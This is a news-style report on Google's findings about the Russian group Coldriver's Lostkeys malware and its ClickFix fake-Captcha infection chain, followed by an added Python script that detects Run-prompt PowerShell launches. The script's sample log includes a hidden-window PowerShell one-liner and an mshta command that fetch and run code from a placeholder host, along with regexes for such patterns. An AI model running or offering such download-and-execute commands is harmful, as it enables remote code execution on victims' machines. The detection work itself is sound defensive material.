Malware Targets Western Officials, NGOs, and Journalists

Google researchers report that the Russian cyber espionage group Coldriver is deploying a new strain of malware, tracked as Lostkeys, in targeted operations against Western officials, non-governmental organizations (NGOs) and journalists. The campaign is notable less for its scale than for what it signals: a group long known for credential phishing is now dropping malware that pulls documents off compromised hosts.
Google's threat intelligence team links Lostkeys to Coldriver, which is also tracked as UNC4057, Star Blizzard and Callisto. The group is attributed to Russia's Federal Security Service, the successor to the KGB, and has built its reputation on credential phishing. Lostkeys points to a step up in capability: a multi-stage infection chain aimed at document theft and sensitive data harvesting.
Several members of Coldriver have been indicted in the U.S. and sanctioned by the European Union, the U.K. and the United States. A December 2023 advisory from the Five Eyes intelligence alliance warned that the group remained active, and it has previously been accused of running "hack and leak" operations.
Lostkeys marks a shift in Coldriver's methodology from credential theft alone to compromise of the victim's system. According to Google, the malware is deployed selectively, only against individuals and organizations the group considers high-value.
Google observed Lostkeys activity in January, March and April 2025, and has found samples that may date back to December 2023. The group's targets typically include current and former Western government advisors, think tanks and individuals connected to Ukraine.
The infection chain begins with a fake Captcha page that instructs the victim to paste PowerShell code into the Windows Run prompt, a technique known as "ClickFix." Because the victim launches the command themselves, the technique sidesteps controls aimed at malicious downloads and attachments and depends entirely on user compliance.
Once executed, the PowerShell script retrieves a series of payloads from a command-and-control server, with each stage requesting the next using identifiers unique to the target. The malware also performs a simple sandbox-evasion check: it computes a hash of the device's display resolution and halts before the final stage if the value matches ones associated with virtual machines.
The final payload, a Visual Basic Script, exfiltrates files with targeted extensions, collects system information and a list of running processes, and sends everything back to the attackers in an encoded format. The functionality resembles that of Spica, an earlier Coldriver malware family reported in 2024, but with a more refined architecture.
Earlier samples of Lostkeys posed as legitimate applications and used executable files rather than PowerShell. Google has not yet determined whether those versions belong to the same campaign or are iterations of the malware repurposed by another actor.
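As an added illustration (not code from the article or from Google's report), the following Python detection logic runs over a few constructed Sysmon-style process-creation records and flags the footprint ClickFix leaves behind: a script interpreter launched directly by explorer.exe, as happens from the Run prompt, with a command line that downloads and evaluates remote code. Field names follow Sysmon Event ID 1; the sample records, the scoring weights, the regex list and the alert threshold are assumptions for the example, not indicators published for Lostkeys.

```python
"""ClickFix-style Run-prompt detection over process-creation events.

Added example, not from the article or from Google's report. The input is
a handful of constructed Sysmon Event ID 1 style records in JSON lines form.
"""
import json
import re

# Interpreters a victim can launch from Win+R (names compared lower-cased).
RUN_PROMPT_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line fragments typical of paste-and-run loaders. Each entry is a
# regex (matched against the lower-cased command line) and the reason reported.
SUSPICIOUS_PATTERNS = [
    (r"\biex\b|invoke-expression", "evaluates downloaded text with Invoke-Expression"),
    (r"\birm\b|invoke-webrequest|invoke-restmethod|downloadstring", "fetches a remote payload"),
    (r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", "hidden or non-interactive window flags"),
    (r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", "base64-encoded command"),
    (r"https?://", "embedded URL"),
]

# Constructed sample log: one benign PowerShell launch from the desktop, one
# ClickFix-style paste, one build script from an IDE, one mshta Run-prompt launch.
SAMPLE_LOG = "\n".join([
    json.dumps({"ProcessId": 1001, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"}),
    json.dumps({"ProcessId": 4242, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/captcha.txt)"'}),
    json.dumps({"ProcessId": 2200, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
                "CommandLine": "powershell.exe -noprofile -file build.ps1"}),
    json.dumps({"ProcessId": 4311, "Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "mshta.exe https://example.invalid/verify.hta"}),
])


def parse_events(log_text):
    """Parse JSON-lines process-creation records into dicts, skipping blank lines."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "").lower()
    score, reasons = 0, []
    # The Run prompt is hosted by explorer.exe, so a scripting host whose parent
    # is explorer.exe is consistent with a user having pasted the command.
    if image in RUN_PROMPT_INTERPRETERS and parent == "explorer.exe":
        score += 2
        reasons.append(f"{image} spawned directly by explorer.exe (Run prompt or shell)")
    for pattern, why in SUSPICIOUS_PATTERNS:
        if re.search(pattern, cmd):
            score += 1
            reasons.append(why)
    return score, reasons


def detect_clickfix(events, threshold=3):
    """Return records scoring at or above the (assumed) alert threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev.get("ProcessId"), "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect_clickfix(parse_events(SAMPLE_LOG)):
        print(f"PID {hit['pid']} score {hit['score']}: " + "; ".join(hit["reasons"]))
```

A plain PowerShell launch from the desktop scores only on the parent-child relationship and stays below the threshold, while the pasted one-liner trips the download, evaluation, hidden-window and URL checks as well. In production the same logic would be fed from Sysmon or Windows Security 4688 events with command-line auditing enabled, and a case-sensitive or Unicode-obfuscated command line would need normalising before the regexes run.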